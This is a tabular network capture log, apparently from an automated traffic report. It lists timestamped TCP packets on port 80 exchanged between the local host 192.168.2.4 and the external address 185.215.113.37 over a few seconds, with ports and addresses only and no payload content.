Sep 30, 2024 07:08:10.612442970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612443924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.612458944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612468004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.612469912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612482071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612493038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.612493992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612504959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612515926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612519979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.612549067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.612571955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.612816095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612827063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612838030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612848997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612859964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612869978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612876892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.612915993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.687947035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.687971115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.687982082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.688040018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.688040018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.688051939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.688064098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.688083887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.688114882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.688126087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.688129902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.688138962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.688155890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.688184977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.688225985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.688236952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.688247919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.688260078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.688271046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.688271999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.688293934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.688321114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.733686924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.733700991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.733726978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.733736992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.733747005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.733757973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.733757973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.733771086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.733797073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.733813047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.733828068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.733841896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.733858109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.733869076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.733879089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.733902931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.733916044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.733968973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.733978987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.733994961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734005928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734014988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734014988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734023094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734026909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734047890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734055996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734066963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734072924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734088898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734097958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734116077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734119892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734131098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734133005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734164000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734175920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734217882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734230042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734240055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734251022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734261036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734273911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734298944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734302044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734311104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734323978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734338045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734340906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734357119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734361887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734395027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734415054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734426022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734438896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734456062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734476089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734478951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734489918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734500885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734512091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734519005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734544039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734566927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734581947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734601021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734616995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734663010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734673023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734683037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.734688044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734713078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734713078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.734738111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.903218031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.903233051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.903250933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.903260946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.903271914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.903284073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.903354883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.903409958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.032737970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.032757044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.032768965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.032804012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.032815933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.032829046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.032840014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.032892942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.032907009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.032918930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.032929897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.032942057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.032942057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.032957077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.032975912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.032994986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.033006907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.033023119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.033034086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.033041954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.033068895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.033086061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.161917925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.161953926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.161963940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.161972046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.161981106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.161993027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162045956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162065029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162076950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162156105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162166119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162177086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162189960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162195921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.162257910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.162273884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162277937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.162288904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162301064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162313938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162327051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.162342072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.162373066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.162451982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162462950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162473917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162477970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162484884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162488937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162496090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162507057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162513018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162512064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.162522078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162559032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.162590027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.162590981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162636995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.162647009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162659883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162671089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162683010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162693977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.162724018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.162758112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162769079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162780046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.162801027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.162827969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.162846088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.203263998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.208278894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425052881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425081968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425093889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425105095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425127983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.425170898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.425244093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425276041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425286055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425292969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.425318003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.425335884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.425384998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425396919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425407887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425419092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425431013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.425458908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.425522089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425532103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425542116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425551891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425561905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425565004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.425595045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.425620079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.425676107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425687075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425698996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425710917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425726891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.425754070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.425825119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425836086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425847054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425858021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425868988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425870895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.425880909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425890923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.425895929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425906897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425915956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.425916910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425930023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425942898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.425955057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.425957918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.425985098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426006079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426085949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426096916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426109076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426120043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426127911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426131964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426140070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426143885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426156044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426162958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426173925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426201105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426215887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426215887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426227093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426259995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426345110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426358938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426368952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426379919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426390886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426398993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426409006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426422119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426429033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426433086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426454067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426465034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426610947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426621914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426630974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426640987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426651955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426659107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426670074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426672935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426681042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426692009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426702023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426703930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426712036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426718950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426752090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426779032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426879883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426892042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426902056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426913023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426923037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426925898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426934958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426934958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426947117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426951885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426959991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.426961899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.426971912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.427006960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.427006960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.427018881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.427028894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.427028894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.427048922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.427058935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:11.427059889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.427077055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:11.427090883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:12.260118961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:12.260168076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:12.265182018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:12.265197039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:12.981959105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:12.982034922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:13.159435034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:13.164412975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:13.383322001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:13.383337021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:13.383433104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:13.469913006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:13.469927073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:13.469978094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:13.473746061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:13.478535891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:13.697544098 CEST	80	49730	185.215.113.37	192.168.2.4
